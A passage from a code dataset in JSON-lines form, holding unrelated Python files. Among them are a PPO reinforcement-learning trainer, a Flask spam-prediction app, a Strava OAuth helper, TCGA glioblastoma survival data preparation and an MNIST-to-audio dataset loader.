nn.init.constant_(m.bias, 0.0)\n\n\n# Define the Actor Critic\nclass ActorCritic(nn.Module):\n def __init__(self, input_size, output_size, hidden_size=10, 
std=0.0):\n super(ActorCritic, self).__init__()\n\n self.critic = nn.Sequential(\n nn.Linear(input_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, 1)\n )\n\n self.actor = nn.Sequential(\n nn.Linear(input_size, hidden_size*2),\n nn.ReLU(),\n nn.Linear(hidden_size*2, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, output_size)\n )\n\n self.log_std = nn.Parameter(torch.ones(1, output_size) * std)\n self.apply(init_weights)\n\n def forward(self, x):\n value = self.critic(x)\n mu = self.actor(x)\n std = self.log_std.exp().expand_as(mu)\n dist = Normal(mu, std)\n return dist, value\n\n\nclass ExperienceDataset(Dataset):\n def __init__(self, experience):\n super(ExperienceDataset, self).__init__()\n self._exp = []\n for x in experience:\n self._exp.extend(x)\n self._length = len(self._exp)\n\n def __getitem__(self, index):\n return self._exp[index]\n\n def __len__(self):\n return self._length\n\n\ndef compute_returns(rollout, gamma=0.9):\n ret = 0\n\n for i in reversed(range(len(rollout))):\n obs, reward, action_dist, action = rollout[i]\n ret = reward + gamma * ret\n rollout[i] = (obs, reward, action_dist, action, ret)\n\n\ndef getObsVector(state, joints):\n state = np.concatenate((state[Sensors.LOCATION_SENSOR],\n state[Sensors.ORIENTATION_SENSOR],\n state[Sensors.VELOCITY_SENSOR],\n state[Sensors.PRESSURE_SENSOR],\n state[Sensors.RELATIVE_SKELETAL_POSITION_SENSOR],\n state[Sensors.JOINT_ROTATION_SENSOR][0:joints]),\n axis=None)\n return state\n\n\ndef AndroidTest(exp_name=\"exp\", lr=1e-4, env_samples=20, epochs=10,\n episode_length=500, gamma=0.99,\n start_steps=100, energy_cost_weight=0.0,\n reward_type=\"x_dist_max\", hidden_size=256, print_to_file=True):\n\n print(\"Beginning test \", exp_name)\n\n # Hyper parameters\n ppo_epochs = 4\n batch_size = 512\n epsilon = 0.2\n joints = 54\n render = False\n action_multiplier = 3\n\n env = holodeck.make('ExampleLevel', window_res=[256, 256])\n raw_state, rew, done, _ = env.reset()\n state = getObsVector(raw_state, joints)\n\n input_len = state.shape[0]\n\n model = ActorCritic(input_len, joints, hidden_size=hidden_size)\n\n val_loss_func = nn.MSELoss()\n optimizer = optim.Adam(model.parameters(), lr=lr)\n val_losses = []\n policy_losses = []\n\n episode_avg_rewards = []\n\n for e in range(epochs):\n\n experience = []\n rewards = []\n\n # Create env_samples number of episode rollouts\n for j in range(env_samples):\n\n raw_state, rew, done, _ = env.reset()\n\n for _ in range(start_steps):\n env.tick()\n\n raw_state, rew, done, _ = env.step(np.zeros(94))\n\n max_dist = raw_state[Sensors.LOCATION_SENSOR][0]\n\n state = getObsVector(raw_state, joints)\n rollout = []\n\n # Each action in an episode\n for k in range(episode_length):\n torch_state = torch.FloatTensor(state).unsqueeze(0)\n dist, val = model(torch_state)\n\n action = dist.sample().numpy()[0]\n\n obs_raw, reward, terminal, _ = env.step(action_multiplier*np.append(action, np.zeros((94-54))))\n distance = obs_raw[Sensors.LOCATION_SENSOR][0]\n\n energy_cost = np.mean(np.abs(action)) * energy_cost_weight\n\n if reward_type is \"z_dist\":\n reward = obs_raw[Sensors.LOCATION_SENSOR][2]\n elif reward_type is \"x_dist\":\n reward = obs_raw[Sensors.LOCATION_SENSOR][0]\n else:\n if distance > max_dist:\n reward = distance-max_dist\n max_dist = distance\n else:\n reward = 0\n\n reward -= energy_cost\n reward *= 10\n\n obs = getObsVector(obs_raw, joints)\n rewards.append(reward)\n\n 
log_prob = dist.log_prob(torch.tensor(action))\n\n rollout.append((state, reward, log_prob.detach().numpy()[0], action))\n state = obs\n\n if j is -1:\n env.render()\n\n if terminal:\n break\n\n compute_returns(rollout, gamma=gamma)\n experience.append(rollout)\n\n avg_rewards = sum(rewards) / env_samples\n episode_avg_rewards.append(avg_rewards)\n print(\"Epoch: \", e, \"/\", epochs, \" Avg Reward: \", avg_rewards)\n\n exp_data = ExperienceDataset(experience)\n exp_loader = DataLoader(exp_data, batch_size=batch_size, shuffle=True, pin_memory=True)\n\n for _ in range(ppo_epochs):\n # Train network on batches of states\n for observation, reward, old_log_prob, action, ret in exp_loader:\n optimizer.zero_grad()\n new_dist, value = model(observation.float())\n\n ret = ret.unsqueeze(1)\n\n advantage = ret.float() - value.detach()\n\n new_log_prob = new_dist.log_prob(action)\n\n r_theta = (new_log_prob - old_log_prob).exp()\n\n clipped = r_theta.clamp(1 - epsilon, 1 + epsilon)\n\n objective = torch.min(r_theta * advantage, clipped * advantage)\n\n policy_loss = -torch.mean(objective)\n val_loss = val_loss_func(ret.float(), value)\n\n loss = policy_loss + val_loss\n loss.backward()\n\n optimizer.step()\n val_losses.append(val_loss.detach().numpy())\n policy_losses.append(policy_loss.detach().numpy())\n\n if e % 10 == 0:\n model_name = 'Dec10Exp/Exp' + exp_name + str(e) + '_reward_' + str(int(avg_rewards)) + '.model'\n torch.save(model, model_name)\n\n\nif __name__ == '__main__':\n exp = int(sys.argv[1])\n\n \"\"\"\n Changes:\n Added velocity sensor and pressure sensor\n Set bias initialization to 0\n \n \n \"\"\"","sub_path":"android/android_exp2.py","file_name":"android_exp2.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"540089046","text":"\ndef dateof():\n wet = int(input(\"enter the year of birth\\n\"))\n eet =(input(\"Press 1 if you want to check in a particular year or 2 to know the year of 100\\n\"))\n if eet=='1':\n eet = int(input(\"Enter the year you want to check\\n\"))\n print(eet-wet)\n elif eet == \"2\":\n print(f'you will 100 in {wet+100}')\n elif wet<120:\n print (120-wet)\n elif wet<1910:\n print(\"You are the Oldest Person On the Earth Show me the pic of yours with Gandhi.ji \")\n else:\n print(\"invalid entry\")\n\ndef age():\n wet = int(input(\"Enter Your Age\\n\"))\n eet = (input(\"Press 1 if you want to check in a particular year or 2 to know year of 100\\n\"))\n wwet = 2019-wet\n if eet=='1':\n eet = int(input(\"Enter the year you want to check\\n\"))\n print(eet-wwet)\n elif eet == \"2\":\n print(f'you will 100 in {wwet+100}')\n elif wet<120:\n print (120-wwet)\n elif wet>110:\n print(\"You are the Oldest Person On the Earth Show me the pic of yours with Gandhi.ji \")\n else:\n print(\"invalid entry\")\nif __name__ ==\"__main__\":\n it = int(input(\"Press 1 to Enter Age OR Press 2 to Enter Date Of Birth \\n\"))\n if it == 1:\n dateof()\n exit(0)\n else:\n age()\n exit(0)","sub_path":"Agecalculator.py","file_name":"Agecalculator.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"566407919","text":"import numpy as np\n\nN_steps = 100\nN_substeps = 10\nk_field = -0.05\n\nDt = 1.\n\nx =1e-3\nvx = 0.\n\nx_record = []\n\n#for ii in range(N_steps):\n# E = k_field*x\n# vx += E*Dt\n# x += vx*Dt\n# x_record.append(x)\n\nfor ii in range(N_steps):\n E = k_field*x\n for ssn in 
range(N_substeps):\n vx += E*Dt/N_substeps\n x += vx*Dt/N_substeps\n x_record.append(x)\n\nimport matplotlib.pyplot as plt\nplt.close('all')\nplt.plot(x_record)\nplt.grid(True)\nplt.show()\n\n","sub_path":"other/electron_oscillations/001_simple_euler.py","file_name":"001_simple_euler.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"274395560","text":"# Cropping in OpenCV simply utilizes array slicing in Numpy.\n\nimport argparse\n\nimport cv2\n\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True, help=\"Path to the image\")\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"Original\", image)\n\n# cropping an image manually\ncropped = image[30:120, 240:335] # If used on the image trex.png this encapsulates its head\ncv2.imshow(\"Cropped image\", cropped)\n\ncv2.waitKey(0)\n","sub_path":"example_code/basic/cropping.py","file_name":"cropping.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"143603277","text":"from imctools.io.imcacquisition import ImcAcquisition\nfrom imctools.io.omeparserbase import OmeParserBase\nimport tifffile\nimport numpy as np\nimport xml.etree.ElementTree as et\nfrom imctools.io.abstractparser import AbstractParser\n\nclass OmetiffParser(AbstractParser, OmeParserBase):\n \"\"\"\n Parses an ome tiff\n\n \"\"\"\n\n def __init__(self, original_file):\n \"\"\"\n\n :param filename:\n \"\"\"\n #self._data = None\n #self._ome = None\n AbstractParser.__init__(self)\n self.read_image(original_file)\n self.filename = original_file\n self.n_acquisitions = 1\n OmeParserBase.__init__(self, self.data, self.ome, origin='ome.tiff')\n\n def get_imc_acquisition(self):\n \"\"\"\n Get Imc Acquisition object\n\n :return:\n \"\"\"\n meta = self.meta_dict\n return ImcAcquisition(meta['image_ID'], self.original_file,\n self.data,\n meta['channel_metals'],\n meta['channel_labels'],\n original_metadata=self.ome ,\n image_description=None,\n origin=self.origin,\n offset=0)\n\n def read_image(self, filename):\n with tifffile.TiffFile(filename) as tif:\n try:\n self.data = tif.asarray(out='memmap')\n except:\n # this is in an older tifffile version is used\n self.data = tif.asarray()\n try:\n self.ome = tif.pages[0].tags['ImageDescription'].value\n except:\n self.ome = tif.pages[0].tags['image_description'].value\n\n\n\n # @staticmethod\n # def reshape_flat(data):\n # \"\"\"\n # Reshape the image data into the flat format.\n # :param data:\n # :return:\n # \"\"\"\n # print(data[0,0,:5])\n # c, y, x = data.shape\n # h = x * y\n # data = np.reshape(data.ravel(order='C'),(h, c), order='F')\n # data = np.hstack((np.tile(np.arange(x),y).reshape((h,1)),\n # np.repeat(np.arange(y),x).reshape((h,1)),\n # (np.arange(h)+1).reshape((h, 1)),\n # data))\n # return data\n\nif __name__ == '__main__':\n fn = '/home/vitoz/temp/HIER_healthy_4_3_HIER5_4.ome.tiff'\n parser = OmetiffParser(fn)\n imc_ac = parser.get_imc_acquisition()\n import matplotlib.pyplot as plt\n plt.figure()\n dat = np.array(imc_ac.get_img_stack_cyx([0])).squeeze()\n plt.imshow(np.array(imc_ac.get_img_stack_cyx([0])).squeeze())\n plt.show()\n print(imc_ac)\n 
print(imc_ac.channel_metals)\n","sub_path":"imctools/io/ometiffparser.py","file_name":"ometiffparser.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"45906905","text":"# Copyright (c) 2015–2016 Molly White\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport config\nimport os\nimport pickle\nimport re\nimport smtplib\nfrom datetime import date\n\n__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\n\ndef get_state():\n \"\"\"Get stored state information.\"\"\"\n try:\n with open('state.pickle', 'rb') as f:\n state = pickle.load(f)\n except IOError:\n state = {\"logs\": {},\n \"latest_links\": []}\n return state\n\n\ndef save_state(state):\n \"\"\"Pickle the state dictionary.\"\"\"\n with open('state.pickle', 'wb') as f:\n pickle.dump(state, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef split_file(file, state):\n \"\"\"Grab only the chunk of the file that was updated since the last runthrough, and record the\n timestamp of the last line in the file.\"\"\"\n # Read in the entire logfile\n with open(file, 'r', encoding='utf-8', errors='replace') as f:\n full_log = f.read()\n\n # Get only the entries from after the last runthrough\n if file in state[\"logs\"]:\n last_parsed = state[\"logs\"][file]\n ind = full_log.rfind(\"\\n\" + last_parsed)\n log = full_log[ind:]\n else:\n log = full_log\n\n # Get the last timestamp in the file to store in the state\n last_line = full_log.splitlines()[-1]\n m = re.match(r'\\d{2}/\\d{2}/\\d{2} \\d{2}:\\d{2}', last_line)\n if m:\n state[\"logs\"][file] = m.group(0)\n\n return log, state\n\n\ndef find_links(log, filename):\n \"\"\"Pull out links from the log.\"\"\"\n links = []\n verbose_links = []\n log_lines = log.splitlines()\n for ind, line in enumerate(log_lines):\n if \"http\" in line:\n m = re.search(r'(http.*?)(?:\\s|\\Z)', log_lines[ind])\n if m:\n if m.group(1) not in config.link_blacklist:\n links.append(m.group(1))\n if 2 < ind < len(log_lines) - 5:\n verbose_links.append(\"\\n\".join([filename] + log_lines[ind - 2:ind + 5]))\n else:\n verbose_links.append(log_lines[ind])\n return links, verbose_links\n\n\ndef email_links(links):\n \"\"\"Send an email with the links from this run.\"\"\"\n today = date.today().strftime(\"%b %0d\")\n body = \"\\n\\n\".join(links) if links else \"No new links today!\"\n message = \"From: {0}\\nTo: {1}\\nSubject: Feminist rage links of the day for {2}\\n\\n{3}\"\\\n 
.format(config.from_email, \",\".join(config.to_email), today, body)\n message = message.encode(\"ascii\", \"replace\")\n\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.ehlo()\n server.starttls()\n server.login(config.smtp_login, config.smtp_password)\n server.sendmail(config.from_email, config.to_email, message)\n server.quit()\n\n\ndef run():\n \"\"\"Run through the logfiles and pull out the links since the last pass through.\"\"\"\n links = []\n verbose_links = []\n state = get_state()\n for file in config.files:\n log, state = split_file(file, state)\n new_links, new_verbose_links = find_links(log, file)\n links += new_links\n verbose_links += new_verbose_links\n state[\"latest_links\"] += links\n email_links(verbose_links)\n save_state(state)\n print(\"Email sent; links recorded.\")\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"link_finder.py","file_name":"link_finder.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"148479141","text":"from PIL import Image\nimport numpy\nimport os\n\ndef problem1():\n img_src = Image.open(\"mars.png\")\n img_src.save(\"result/mars1.png\")\n\ndef problem2():\n img_src = Image.new('RGB', (128, 128), (255, 255, 255))\n img_mat = numpy.array(img_src)\n for i in range(img_mat.shape[0]):\n img_mat[i,i] = [0, 0, 0]\n img = Image.fromarray(img_mat)\n img.save(\"result/p1.png\")\n\ndef problem3():\n img_src = Image.open(\"mars.png\")\n img_src = img_src.point(lambda i: 255*((float(i)/255)**(1/2.2)))\n img_src.save(\"result/q3.png\")\n\ndef test():\n img1 = Image.open('mars.png')\n img2 = Image.open('result/q3.png')\n img1_mat = numpy.array(img1)\n img2_mat = numpy.array(img2)\n\n\ndef day1_run():\n problem1()\n problem2()\n problem3()\n\nif __name__ == '__main__':\n try:\n os.mkdir('result')\n except FileExistsError:\n print('Dir exist!')\n day1_run()\n \n\n","sub_path":"day1/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"549729925","text":"# import numpy as np\r\nfrom flask import Flask, request, jsonify, render_template\r\nfrom sklearn.pipeline import Pipeline\r\nimport pickle\r\n\r\napp = Flask(__name__,static_url_path='/templates/',static_folder='templates')\r\nmodel = pickle.load(open('C:\\\\Users\\\\Aniket Ratnaparakhi\\\\PycharmProjects\\\\SMS_SPAM_NEW\\\\finalized_model.pkl', 'rb'))\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index1.html')\r\n\r\n@app.route('/predict',methods=['POST'])\r\ndef predict():\r\n\r\n final_feature = request.form.values()\r\n prediction = model.predict(final_feature)\r\n result = ['WAIT A MINUTE, This IS A SPAM!', 'OHHH, THIS IS A NORMAL MESSAGE.']\r\n # output = (prediction[0], 2)\r\n # def pre():\r\n if prediction:\r\n out=result[0]\r\n else:\r\n out=result[1]\r\n\r\n return render_template('index1.html', prediction_text=out)\r\n\r\n@app.route('/results',methods=['POST'])\r\ndef results():\r\n\r\n data = str(request.get_json(force=True))\r\n # prediction = model.predict(data.get())\r\n prediction = model.predict(data['msg'])\r\n output = prediction\r\n return jsonify(output)\r\n# @app.route(\"/profile/\")\r\n# def profile(name):\r\n# return render_template(\"test.html\", name=name)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True,port=5000)\r\n # from waitress import serve\r\n # serve(app, host=\"0.0.0.0\", 
port=5000)","sub_path":"main_new.py","file_name":"main_new.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"475097720","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n # Author : Gyeongjae Choi\n # Github : https://github.com/ryanking13\n # Python Version : 3.5.2\n \n This program encodes string to gray-scale image using by ascii value\n\n ### Inspired by Python Challenge (www.pythonchallenge.com) Level7 ###\n\"\"\"\n\nfrom PIL import Image\nimport optparse\nimport math\nimport re\n\n# parse options\ndef parse():\n parser = optparse.OptionParser(\"Usage : \" + \"-s '' or -f \")\n parser.add_option('-s', dest='str', type='string', help='specify the string to encode')\n parser.add_option('-f', dest='str_file', type='string', help='specify the file that string is written')\n\n (options, args) = parser.parse_args()\n\n if (options.str is None) & (options.str_file is None):\n print(parser.usage)\n exit(0)\n\n elif (options.str is not None) & (options.str_file is not None):\n print(\"[-] To many options, please use only ONE option.\")\n exit(0)\n\n elif options.str is not None:\n return options.str.strip('\\'') # in order for the consistency\n\n else:\n return open(options.str_file, 'r', encoding='utf-8-sig').read()\n\n\n# Not Used for Now\ndef find_max_divisor(num):\n\n border = int(math.sqrt(num)) + 1\n\n for i in range(border, 1, -1):\n if num % i == 0:\n return i\n\n return num\n\n\ndef main():\n string = parse()\n length = len(string)\n block_size = 20\n\n x_num = 30\n y_num = length // x_num\n if length % x_num != 0:\n y_num += 1\n leftover = x_num * y_num - length\n\n img = Image.new('RGB', (x_num*block_size, y_num*block_size))\n px = img.load()\n\n for i in range(length):\n x_st = i % x_num\n y_st = i // x_num\n color = ord(string[i])\n if color > 255: # some out of ascii values\n color = 32 # empty\n\n for x in range(block_size):\n for y in range(block_size):\n px[x_st*block_size + x, y_st*block_size + y] = (color, color, color)\n\n for i in range(leftover):\n x_st = x_num - leftover + i;\n y_st = y_num - 1\n color = 32 # empty\n\n for x in range(block_size):\n for y in range(block_size):\n px[x_st*block_size + x, y_st*block_size + y] = (color, color, color)\n\n img.save('saved.jpg')\n\n\nif __name__ == '__main__':\n main()","sub_path":"text-to-gray-scale/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"170917294","text":"import stravalib\nimport http.server as BaseHTTPServer\nimport urllib.parse as urlparse\nimport webbrowser\nimport sys\nimport json\n\nclass MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n #Handle the web data sent from the strava API\n def do_HEAD(self):\n return self.do_GET()\n\n def do_GET(self):\n #Get the API code for Strava\n # self.wfile.write(b'')\n code = urlparse.parse_qs(urlparse.urlparse(self.path).query)['code'][0]\n # Login to the API\n token = useCode(code)\n # Create page\n self.send_response(200)\n self.send_header(b\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(b\"Token received\")\n self.wfile.write(bytes(\"
<html><body><h1>Received and saved access token %s</h1></body></html>
\" % str(token['access_token']), \"utf-8\"))\n self.wfile.write(b\"\")\n return self.save_token(token)\n\n def save_token(self, token):\n with open(r'tokens\\user_access.token', 'w') as file:\n file.write(json.dumps(token))\ndef useCode(code):\n # Put your data in file 'tokens/client.token' and separate the fields with a comma: clientid,clientsecrettoken\n with open(r'tokens\\client.token', 'r') as file:\n client_secret = file.read().split(',')\n client_id, secret = client_secret[0], client_secret[1]\n client = stravalib.client.Client()\n #Retrieve the login code from the Strava server\n access_token = client.exchange_code_for_token(client_id=client_id,\n client_secret=secret, code=code)\n return access_token\n\ndef authorize():\n port = 8008\n url = 'http://localhost:%d/authorization' % port\n\n #Create the strava client, and open the web browser for authentication\n client = stravalib.client.Client()\n authorize_url = client.authorization_url(client_id=28605,\n redirect_uri=url,\n approval_prompt='auto',\n scope='activity:read_all')\n print('Opening: %s' % authorize_url)\n webbrowser.open(authorize_url)\n try:\n httpd = BaseHTTPServer.HTTPServer(('localhost', port), MyHandler)\n httpd.handle_request()\n except KeyboardInterrupt:\n # Allow ^C to interrupt from any thread.\n sys.stdout.write('\\033[0m')\n sys.stdout.write('User Interupt\\n')\ndef save_token(token):\n with open(r'tokens\\user_access.token', 'w') as file:\n file.write(json.dumps(token))\n\ndef refresh(refresh_token):\n client = stravalib.client.Client()\n with open(r'tokens\\client.token', 'r') as file:\n client_secret = file.read().split(',')\n client_id, secret = client_secret[0], client_secret[1]\n token = client.refresh_access_token(client_id,secret,refresh_token)\n save_token(token)\n return token\n\n","sub_path":"tools/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"591114444","text":"import json\nimport re\n\n\npattern = r'==.*=='\nre_pattern = re.compile(pattern)\nsection_delimiter = '='\n\n\ndef main():\n with open('england.json', 'r') as f:\n j_dic = json.loads(f.read())\n for line in j_dic['text'].split('\\n'):\n if re_pattern.match(line.lower()):\n print(f'level : {line.count(section_delimiter)/2 - 1} / section : [{line.replace(\"=\", \"\")}]')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"chapter_3/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"635684796","text":"from argparse import ArgumentParser\n\nparser = ArgumentParser(description='')\nparser.add_argument(['-c', '--continue'], metavar='path to save file', type=str, nargs='1',\n help='path to save file to continue', default=None)\nparser.add_argument(['-p', '--provision'], metavar='provision as float', type=float, nargs='1',\n help='path to save file to continue', default=0.05)\n\nargs = parser.parse_args()\n\n#add shutdown hook for saving\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"582691797","text":"# tcga_pre_gbm_survival.py\r\n# Prepare GBM survival rate data: tcga_gbm_survival.txt\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom os import listdir\r\nfrom os.path import isfile, 
join\r\nimport math\r\n\r\npath1 = 'rawdata/tcga_gbm/gdac.broadinstitute.org_GBM.Mutation_Packager_Oncotated_Calls.Level_3.2016012800.0.0/'\r\nfiles = [f for f in listdir(path1) if isfile(join(path1, f))]\r\nfiles.remove('MANIFEST.txt')\r\npat2mut = {}\r\nfor fl in files:\r\n f = open(path1+fl,'r')\r\n pat = fl.split('.')[0][:12].lower()\r\n # first 4 lines not useful\r\n for _ in range(4): next(f)\r\n pat2mut[pat] = set()\r\n for line in f:\r\n mut = line.strip().split('\\t')[0].lower()\r\n pat2mut[pat].add(mut)\r\n f.close()\r\n\r\n# vital status of some patients not available.\r\nsv = pd.read_csv('rawdata/tcga_gbm/tcga_gbm_survival_mid.txt',sep='\\t')\r\n# 0: status; 1: days_to_death; 2: days_to_last_followup; 3: days_to_birth.\r\n\r\n# set of patients that have both mutation data and survival data.\r\nsetpat = set()\r\n# set of mutations that exists in the dataset we use.\r\nsetmut = set()\r\nf = open('inputdata/tcga_gbm_survival.txt','w')\r\nprint >> f, 'pat\\tage\\tstatus\\ttime'\r\nfor pat in pat2mut.keys():\r\n # only mutation data available\r\n if pat not in sv.keys(): continue\r\n patc = sv[pat]\r\n if patc[0] == 'dead':\r\n time = float(patc[1])\r\n status = '1'\r\n elif patc[0] == 'alive':\r\n time = float(patc[2])\r\n status = '0'\r\n # status not available\r\n else: continue\r\n # both time not available\r\n if math.isnan(time): continue\r\n age = int(-1.0*float(patc[3])/365.24)\r\n print >> f, pat+'\\t'+str(age)+'\\t'+status+'\\t'+str(time)\r\n setpat.add(pat)\r\n setmut = setmut | pat2mut[pat]\r\nf.close()\r\nsetmut = sorted(list(setmut))\r\n\r\n\r\nf = open('inputdata/tcga_gbm_setmut.txt', 'w')\r\nprint >> f, '\\n'.join(setmut)\r\nf.close()\r\n# stat: 9,621 mutations in total.\r\n\r\nf = open('inputdata/tcga_gbm_pat2mut.txt', 'w')\r\nfor pat in setpat:\r\n print >> f, pat+'\\t'+'\\t'.join(list(pat2mut[pat]))\r\nf.close()\r\n# stat: 284 pat, 225 dead, 59 alive.\r\n# 1: dead; 0: alive.\r\n\r\n#EOF.\r\n","sub_path":"charge/tcga/tcga_pre_gbm_survival.py","file_name":"tcga_pre_gbm_survival.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"198217676","text":"# spacy.explain('')\n\n#\n# import spacy\n# nlp = spacy.load(\"en_core_web_sm\")\n# doc = nlp(u\"This is a sentence.\")\n# print([(w.text, w.pos_) for w in doc])\n\nimport spacy\n# spacy.explain('pos)\n\nnlp = spacy.load(\"en_core_web_sm\")\n\ntext = \"I'm going to be visiting Japan this summer with family\"\n\ntext2 = \"I'm going to be doing an internship this summer\"\n\n# Process the text\ndoc = nlp(text)\n\nfor chunk in doc.noun_chunks:\n print(chunk.text, chunk.root.text, chunk.root.dep_,\n chunk.root.head.text)\n\n# for token in doc:\n# # Get the token text, part-of-speech tag and dependency label\n# token_text = token.text\n# token_pos = token.pos_\n# token_dep = token.dep_\n# # This is for formatting only\n# print(\"{:<12}{:<10}{:<10}\".format(token_text, token_pos, token_dep))","sub_path":"backend/old_and_test_files/jacob-tries-spacy.py","file_name":"jacob-tries-spacy.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"18133165","text":"from __future__ import print_function\nfrom PIL import Image\nimport os\nimport pdb\nimport torch\nimport os.path\nimport numpy as np\nimport sys\nif sys.version_info[0] == 2:\n import cPickle as pickle\nelse:\n import pickle\n\nimport torch.utils.data as data\nfrom audioVoiceMat import 
extract_sound_from_voice\nfrom vggish_input import *\n\nimport matplotlib.pyplot as plt\n\nclass MNIST(data.Dataset):\n \"\"\"`MNIST `_ Dataset.\n Args:\n root (string): Root directory of dataset where ``processed/training.pt``\n and ``processed/test.pt`` exist.\n train (bool, optional): If True, creates dataset from ``training.pt``,\n otherwise from ``test.pt``.\n download (bool, optional): If true, downloads the dataset from the internet and\n puts it in root directory. If dataset is already downloaded, it is not\n downloaded again.\n transform (callable, optional): A function/transform that takes in an PIL image\n and returns a transformed version. E.g, ``transforms.RandomCrop``\n target_transform (callable, optional): A function/transform that takes in the\n target and transforms it.\n \"\"\"\n urls = [\n 'http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz',\n 'http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz',\n 'http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz',\n 'http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz',\n ]\n training_file = 'training.pt'\n test_file = 'test.pt'\n classes = ['0 - zero', '1 - one', '2 - two', '3 - three', '4 - four',\n '5 - five', '6 - six', '7 - seven', '8 - eight', '9 - nine']\n\n def __init__(self, root, train=True, transform=None, target_transform=None):\n self.root = os.path.expanduser(root)\n self.transform = transform\n self.target_transform = target_transform\n self.train = train # training set or test set\n\n if not self._check_exists():\n raise RuntimeError('Dataset not found.' +\n ' You can use download=True to download it')\n\n if self.train:\n data_file = self.training_file\n else:\n data_file = self.test_file\n self.data, self.targets = torch.load(os.path.join(self.processed_folder, data_file))\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n img, target = self.data[index], int(self.targets[index])\n\n img = np.array(img)\n sound = np.array(extract_sound_from_voice(img))\n feat = waveform_to_examples(sound, 22050).astype('float32')\n\n return feat, target\n\n def debug_getitem__(self, index=100):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n img, target = self.data[index], int(self.targets[index])\n img = np.array(img)\n pdb.set_trace()\n sound = np.array(extract_sound_from_voice(img))\n feat = waveform_to_examples(sound, 22050).astype('float32')\n\n return feat, target\n\n def __len__(self):\n return len(self.data)\n\n @property\n def raw_folder(self):\n return os.path.join(self.root, 'raw')\n\n @property\n def processed_folder(self):\n return os.path.join(self.root, 'processed')\n\n @property\n def class_to_idx(self):\n return {_class: i for i, _class in enumerate(self.classes)}\n\n def _check_exists(self):\n # pdb.set_trace()\n return os.path.exists(os.path.join(self.processed_folder, self.training_file)) and \\\n os.path.exists(os.path.join(self.processed_folder, 